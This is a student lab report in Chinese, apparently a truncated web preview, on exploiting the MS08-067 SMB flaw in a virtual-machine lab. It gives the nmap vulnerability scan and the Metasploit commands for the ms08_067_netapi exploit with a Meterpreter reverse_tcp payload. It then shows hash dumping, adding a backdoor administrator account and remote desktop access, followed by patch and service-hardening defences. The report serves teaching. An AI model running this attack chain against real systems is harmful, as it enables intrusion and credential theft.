緩沖區(qū)溢出攻擊和防范實(shí)驗(yàn)報(bào)告_第1頁
緩沖區(qū)溢出攻擊和防范實(shí)驗(yàn)報(bào)告_第2頁
緩沖區(qū)溢出攻擊和防范實(shí)驗(yàn)報(bào)告_第3頁
緩沖區(qū)溢出攻擊和防范實(shí)驗(yàn)報(bào)告_第4頁
緩沖區(qū)溢出攻擊和防范實(shí)驗(yàn)報(bào)告_第5頁
已閱讀5頁,還剩15頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

實(shí)驗(yàn)六報(bào)告課程名稱網(wǎng)絡(luò)安全實(shí)驗(yàn)成績實(shí)驗(yàn)名稱緩沖區(qū)溢出攻擊與防備實(shí)驗(yàn)學(xué)號209姓名鄭明毅班級網(wǎng)絡(luò)工程2班日期/6/7實(shí)驗(yàn)報(bào)告一、實(shí)驗(yàn)?zāi)康募耙?guī)定:實(shí)驗(yàn)?zāi)康耐ㄟ^實(shí)驗(yàn)掌握緩沖區(qū)溢出的原理;理解緩沖區(qū)溢出危險(xiǎn)性;理解防備和避免緩沖區(qū)溢出攻擊的方法。實(shí)驗(yàn)規(guī)定(1)運(yùn)用緩沖區(qū)溢出工具或者運(yùn)用一種簡樸的溢出C程序進(jìn)行溢出漏洞攻擊(2)分析緩沖區(qū)溢出攻擊原理和危害(3)給出防備和避免緩沖區(qū)溢出攻擊的方法二、實(shí)驗(yàn)過程及要點(diǎn):實(shí)驗(yàn)過程:MS08-067(WindowsServer服務(wù)RPC請求緩沖區(qū)溢出漏洞)遠(yuǎn)程緩沖區(qū)溢出攻擊測試1

網(wǎng)絡(luò)測試環(huán)境構(gòu)建

首先需要先配備好一種滲入測試用的網(wǎng)絡(luò)環(huán)境,涉及如圖1所示的運(yùn)行win10系統(tǒng)的計(jì)算機(jī),如圖2所示的Windows系統(tǒng)(虛擬機(jī)環(huán)境下)的計(jì)算機(jī)。顯然這2臺計(jì)算機(jī)處在同一種網(wǎng)段中,能夠互相通訊,win10系統(tǒng)用作攻擊機(jī),下面將在此系統(tǒng)上運(yùn)行Metasploit進(jìn)行滲入測試,而Windows系統(tǒng)都是本次任務(wù)中需要進(jìn)行滲入入侵的靶機(jī),保持安裝后的默認(rèn)狀態(tài),沒有打額外的系統(tǒng)安全補(bǔ)丁。圖1win10攻擊機(jī)圖2Windows靶機(jī)2、掃描靶機(jī)在正式開始滲入之前,應(yīng)當(dāng)對靶機(jī)進(jìn)行掃描探測工作,搞清晰滲入目的的系統(tǒng)類型、開放的端口服務(wù)、可能存在的安全漏洞等。

在win10攻擊機(jī)上運(yùn)行metasploitconsole,即可進(jìn)入Metasploit環(huán)境。現(xiàn)在能夠運(yùn)用MSF框架中集成的Nmap掃描器對滲入測試目的進(jìn)行掃描,如圖3所示,獲取了靶機(jī)的開放服務(wù)和操作系統(tǒng)類型等信息。圖3windows掃描成果運(yùn)用掃描器的腳步插件,尚有可能直接探測出目的系統(tǒng)的安全漏洞,例如如圖4所示,Nmap運(yùn)用smb-check-vulns插件掃描探測出了Windows

靶機(jī)存在MS08_067漏洞,命令執(zhí)行以下:nmap-script=smb-check-vulns.nse192.168.56.101。namap掃描的成果里報(bào)告發(fā)現(xiàn)MS08-067:DISABLED。這是在暗示我們或許能夠?qū)@臺主機(jī)進(jìn)行滲入攻擊,然后我們在Metasloit里面找到此漏洞的攻擊模塊,并嘗試攻擊目的機(jī)器。MS08-067是一種對操作系統(tǒng)版本依賴非常高的漏洞,因此在這里,我們只自動(dòng)payload指定一下目的就能夠確保觸發(fā)對的的溢出代碼。圖4漏洞掃描成果3運(yùn)用MS08_067漏洞滲入入侵

MS08-067漏洞的全稱為“WindowsServer服務(wù)RPC請求緩沖區(qū)溢出漏洞”,如果顧客在受影響的系統(tǒng)上收到特制的RPC請求,則該漏洞可能允許遠(yuǎn)程執(zhí)行代碼。在MicrosoftWindowsWindowsXP和WindowsServer系統(tǒng)上,攻擊者可能未經(jīng)身份驗(yàn)證即可運(yùn)用此漏洞運(yùn)行任意代碼,此漏洞可用于進(jìn)行蠕蟲攻擊,現(xiàn)在已有運(yùn)用該漏洞的蠕蟲病毒。防火墻最佳做法和原則的默認(rèn)防火墻配備,有助于保護(hù)網(wǎng)絡(luò)資源免受從公司外部發(fā)起的攻擊,默認(rèn)狀況下能建立空連接。既然已經(jīng)懂得Windows

靶機(jī)存在MS08_067漏洞,下面就在Metasploit環(huán)境中運(yùn)用它進(jìn)行滲入入侵。

首先,輸入searchms08-067查找與其有關(guān)的漏洞攻擊程序,并啟用該滲入攻擊模塊查看基本信息,然后,輸入useexploit/Windows/smb/ms08_067_netapi命令表達(dá)選擇運(yùn)用這個(gè)漏洞,如圖5所示。圖5選擇漏洞如上我們已經(jīng)駕馭了(ms08_067_netapi)這個(gè)漏洞攻擊程序,哈哈!接下來我們要找一找metasploit下的有效攻擊荷載(payload),那就使用命令:showpayloads來查找一下吧!然后用set命令選擇一旦運(yùn)用漏洞滲入進(jìn)去使用什么攻擊載荷,這里使用MSF框架里功效強(qiáng)大的Meterpreter攻擊模塊下的反向連接shell載荷,使用命令:setpayloadwindows/meterpreter/reverse_tcp,執(zhí)行如圖6所示。圖6選擇攻擊載荷完畢滲入攻擊模塊與攻擊載荷模塊的選擇之后,需要查看配備滲入攻擊所需的配備選項(xiàng),具體命令以下:showoptions用show

options命令查看尚有哪些參數(shù)需要配備,根據(jù)目的狀況配備滲入攻擊的選項(xiàng)。如圖7所示:圖7需要配備的參數(shù)now,現(xiàn)在我們需要設(shè)立ip咯,設(shè)立命令:setRHOST192.168.56.101setLHOST172.18.7.191配備本地攻擊機(jī)和遠(yuǎn)程靶機(jī)的IP地址,如圖8所示圖8配備參數(shù)現(xiàn)在呢,我們基本已設(shè)立完畢,接下來我們show一下看看自己的配備都在不?確認(rèn)一下信息:(看到了吧,我們的配備沒問題吧!Ip都有了?。。。。﹫D9檢查配備參數(shù)全部需要的參數(shù)配備好了后來,在進(jìn)行exploit滲入攻擊時(shí),會出現(xiàn)某些狀況,有可能滲入不成功,需要在這時(shí)候謹(jǐn)慎。用exploit或run命令發(fā)動(dòng)攻擊,如圖10所示,滲入成功后,設(shè)立的回連主機(jī)就是Metasploit攻擊主機(jī),攻擊主機(jī)會獲得一種meterpreter控制會話session。圖10成功獲取session吼吼!?。〕晒α耍。。∫殉晒δ孟聦Ψ街鳈C(jī),那么現(xiàn)在你要做什么呢?好的,告訴你一句話:好戲開鑼咯···是時(shí)候讓你體驗(yàn)一下當(dāng)黑客的感覺了!Hello,hacker還等什么呢?好吧,廢話少說,第一種“破壞”玩起!哈哈!實(shí)例1從靶機(jī)拿到的ipconfig/all,如圖11圖11從靶機(jī)拿到的ipconfig/all實(shí)例2獲得系統(tǒng)現(xiàn)在的進(jìn)程列表,如圖12:圖12windows進(jìn)程列表實(shí)例3:獲得現(xiàn)在的工作目錄和顧客id,如圖13:圖13windows的工作目錄和顧客id實(shí)例4:獲得目的系統(tǒng)的password

hash,如圖14:圖14windows的passwordhash實(shí)例5:獲得目的系統(tǒng)的DOSshell,用了meterpreter的session后,即可用多個(gè)命令對遠(yuǎn)程靶機(jī)進(jìn)行操作,如圖15所示。圖15獲得windows的DOSshell實(shí)例6:那我就和靶機(jī)簡樸比較一下命令:ipconfig/all吧!??!圖16shell拿到的windows的ipconfig/all從靶機(jī)拿到的ipconfig/all,如圖17:圖17靶機(jī)拿到的ipconfig/all實(shí)例7在目的靶機(jī)上新建了一種賬號zmy和密碼479(這里用的是我的姓名‘鄭明毅’學(xué)號‘479’),并將其加入到管理員組。為后續(xù)的遠(yuǎn)程控制提供方便,如圖18、19、20所示:(簡樸解釋一下啊win10截圖中全部問號問題:那是由于中文編碼問題:可能是UTF-8的緣故吧!?。。﹫D18查看賬號圖19新建賬號圖20賬號加入管理員組實(shí)例8查看3389端口與否打開(這里已經(jīng)打開了)如圖21,然后用mstsc遠(yuǎn)程桌面連接192.168.56.102(由于windows專業(yè)版沒有3389遠(yuǎn)程端口,因此我這里又安裝了一種windows服務(wù)器版的系統(tǒng),ip地址為192.168.56.102顧客名zmy密碼479)圖21查看3389與否打開圖22添加顧客名zmy密碼479并設(shè)立為Administrators組啟動(dòng)mstsc遠(yuǎn)程桌面連接,如圖23:圖23遠(yuǎn)程桌面連接4.防備Ms08-067遠(yuǎn)程溢出攻擊由于這個(gè)漏洞是致命的,因此一旦被入侵后果將不堪構(gòu)想,因此我們能夠微軟的官方站點(diǎn),下載編號為KB958644的補(bǔ)丁,對其漏洞進(jìn)行修補(bǔ)。再則通過關(guān)閉Computerbrowser、server、workstation這三個(gè)服務(wù)關(guān)閉,也可避免黑客遠(yuǎn)程溢出攻擊,固然安裝防火墻將安全級別設(shè)立為高級,也是一種避免黑客入侵的不錯(cuò)選擇。實(shí)驗(yàn)總結(jié)總結(jié):實(shí)

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論